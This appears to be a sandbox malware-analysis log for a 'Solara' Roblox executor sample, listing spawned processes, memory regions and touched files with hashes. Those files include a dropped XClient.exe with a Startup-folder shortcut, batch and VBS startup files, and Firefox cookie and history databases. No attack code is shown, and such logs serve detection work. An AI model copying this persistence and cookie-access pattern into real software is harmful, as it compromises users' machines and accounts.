"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --edge-webview-custom-scheme --no-appcompat-clear --mojo-platform-channel-handle=2104 --field-trial-handle=1792,i,6703705014908041025,9148991447950061504,262144 --enable-features=MojoIpcz --variations-seed-version /prefetch:3
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --edge-webview-custom-scheme --no-appcompat-clear --mojo-platform-channel-handle=2324 --field-trial-handle=1792,i,6703705014908041025,9148991447950061504,262144 --enable-features=MojoIpcz --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --edge-webview-custom-scheme --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --mojo-platform-channel-handle=3676 --field-trial-handle=1792,i,6703705014908041025,9148991447950061504,262144 --enable-features=MojoIpcz --variations-seed-version /prefetch:1
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.12.1546401626\2013547121" -childID 10 -isForBrowser -prefsHandle 9848 -prefMapHandle 9820 -prefsLen 26734 -prefMapSize 233444 -jsInitHandle 1140 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cc5c9d42-7063-45e1-8988-320bc0d2fa80} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 9924 1e78d2f5658 tab
C:\Users\Admin\XClient.exe
C:\Users\Admin\XClient.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2108 -ip 2108
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2108 -s 3340
Network
Files
memory/2920-0-0x0000000074BFE000-0x0000000074BFF000-memory.dmp
memory/2920-1-0x0000000000A00000-0x0000000000A0A000-memory.dmp
memory/2920-2-0x0000000074BF0000-0x00000000753A0000-memory.dmp
memory/2920-3-0x0000000074BFE000-0x0000000074BFF000-memory.dmp
memory/2920-8-0x0000000005EA0000-0x0000000005EAA000-memory.dmp
C:\Users\Admin\AppData\Local\Solara\Solara_Protect.bat
| MD5 | 49f8779d69c5572c5534a2b83f90334b |
| SHA1 | edbeaff47d9b2fe4244b9710e014924189c086b6 |
| SHA256 | e3120bc12c0d1c82b3d719e8d095fcee2bba9571d2ad85e9e2b1b2dae921cc49 |
| SHA512 | a34cb31c8bdccced3167a1df44e6635cf66ddc544246115639727611aab578e576e98297be42d9496971da4b35db5f8359b8b06499009d885269e3ad3e5fd6bc |
memory/2920-10-0x0000000074BF0000-0x00000000753A0000-memory.dmp
memory/4452-11-0x00000000034F0000-0x0000000003526000-memory.dmp
memory/4452-12-0x0000000074BF0000-0x00000000753A0000-memory.dmp
memory/4452-13-0x0000000074BF0000-0x00000000753A0000-memory.dmp
memory/4452-14-0x0000000005BA0000-0x00000000061C8000-memory.dmp
memory/4452-15-0x0000000005AD0000-0x0000000005AF2000-memory.dmp
memory/4452-17-0x0000000006330000-0x0000000006396000-memory.dmp
memory/4452-16-0x00000000062C0000-0x0000000006326000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hqidukhv.fud.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4452-23-0x00000000063A0000-0x00000000066F4000-memory.dmp
memory/4452-28-0x0000000006950000-0x000000000696E000-memory.dmp
memory/4452-29-0x0000000006E90000-0x0000000006EDC000-memory.dmp
memory/4452-36-0x00000000081A0000-0x000000000881A000-memory.dmp
memory/4452-37-0x0000000006F60000-0x0000000006F7A000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\datareporting\glean\pending_pings\0ec98c56-3a64-4816-bb12-4b1c3a893a77
| MD5 | f453ec46f36200036cd6d59b5d73aafe |
| SHA1 | 2dea7381d5b714c08960484388ad91676b868fca |
| SHA256 | 6028c754bef96f0a541897c6b71fbaaf7c4b5f5c53f6fd6334855d01815306e6 |
| SHA512 | 85e78df5533a2ff1c15fad344676fd02827f915b5d06da5570e601d6e04d0f6e79273004add5aa183d957058813a3ca8443739adad4e4d28b7da4c9ebbc135b6 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\datareporting\glean\pending_pings\3dff6eb0-6484-4bc5-a45f-9d03edc6db5d
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs.js
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\datareporting\glean\db\data.safe.bin
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs.js
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs-1.js
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
C:\Users\Admin\AppData\Roaming\startup_str_469.vbs
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs-1.js
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\storage\default\https+++www.roblox.com\idb\3140325527hBbDa.sqlite
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\15788
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\27586
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\2699
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\14395
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\entries\0D0C8B41B123A60A76177A339C5D673D74E526C6
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\fileaccess\node_modules\hasown\.nycrc
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\fileaccess\node_modules\get-intrinsic\.nycrc
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\fileaccess\node_modules\has-proto\.eslintrc
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
C:\Users\Admin\XClient.exe
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\fileaccess\node_modules\vary\LICENSE
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Wpf.Ui.dll
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Newtonsoft.Json.dll
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Microsoft.Web.WebView2.Wpf.dll
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\storage\default\https+++www.roblox.com\ls\usage
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Microsoft.Web.WebView2.Core.dll
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\WebView2Loader.dll
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.dll
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\vcruntime140.dll
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\zlib1.dll
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\libcurl.dll
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\bin\path.txt
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Microsoft.Web.WebView2.WinForms.dll
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\31182
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Crashpad\settings.dat
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Crashpad\throttle_store.dat
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\4106
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\2469
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\22461
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\16440
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\31074
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\8114
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\8114
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\14982
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\20975
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\27866
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\23389
\??\pipe\crashpad_6580_LWALGUCIWGAEKJFG
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\Extension Rules\MANIFEST-000001
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Local State
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Local State~RFe5ac758.TMP
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Crashpad\settings.dat
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\Sync Data\LevelDB\CURRENT
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\15368
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\13909
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\20889
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Local State
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\19229
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\9432
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\22618
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\Network\SCT Auditing Pending Reports
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\entries\A14C26BA4DDEF07ECA3E158614497D4ED03032A2
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\DawnCache\data_3
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\DawnCache\data_2
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\DawnCache\data_1
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\DawnCache\data_0
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\index.html
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\vs\loader.js
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Local State
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\vs\editor\editor.main.js
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\vs\editor\editor.main.css
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\vs\editor\editor.main.nls.js
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\vs\basic-languages\lua\lua.js
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\Preferences
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\Preferences~RFe5b1c6e.TMP
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\storage\default\https+++www.roblox.com\ls\usage
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\places.sqlite
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\cookies.sqlite
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Local State
C:\Users\Admin\Downloads\RobloxPlayerInstaller.OMvsXMKO.exe.part